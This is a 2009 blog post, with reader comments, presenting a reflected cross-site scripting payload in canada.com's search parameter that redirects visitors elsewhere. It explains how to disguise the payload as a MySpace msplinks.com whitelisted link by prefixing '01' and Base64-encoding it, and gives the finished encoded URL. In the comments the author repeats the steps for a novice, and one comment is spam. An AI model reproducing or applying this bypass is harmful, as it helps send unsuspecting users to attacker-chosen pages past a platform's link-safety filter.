The technique I previously blogged about still works, but ytmnd.com has fixed the XSS vulnerability used in that posting. Here's a hole in another Msplinks.com whitelisted site:
http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('
Just as before 01 is prefixed to the XSS redirect URL, then the result is Base64 encoded and appended to http://www.msplinks.com/.
http://www.msplinks.com/MDFodHRwOi8vd3d3LmNhbmFkYS5jb20vc2VhcmNoL3NlYXJjaC5odG1sP3E9Jyl9d2luZG93LmxvY2F0aW9uPSdodHRwOi8vY3Jvc3Mtc2l0ZS1zY3JpcHRpbmcuYmxvZ3Nwb3QuY29tLyc7eygn
Sunday, October 4, 2009
Subscribe to:
Post Comments (Atom)
If you could tell us noobs what you said, then I'd be happy.
ReplyDeleteSure thing. What are you hung up on?
ReplyDelete" 01 is prefixed to the XSS redirect URL"
ReplyDeleteNot really sure what this means, as I'm new to the java world. I've seen how XSS affects sites when scripts are placed into search bars, but to redirect using whitelisted sites, tough.
" the result is Base64 encoded and appended "
I'm guessing after encoding we add the code to Msplink.com/
I'm stuck at the first part.
It's pretty simple. In this example you would base64 encode 01http://www.canada.com/search/search.html?q=')}window.location='http://cross-site-scripting.blogspot.com/';{('
ReplyDeleteAnd you have step two correct.
Stadtpalais in Frankfurtinkjet ink cartridges
ReplyDeleteI like this post
although its not studied this but I love writing code and learning of information technology.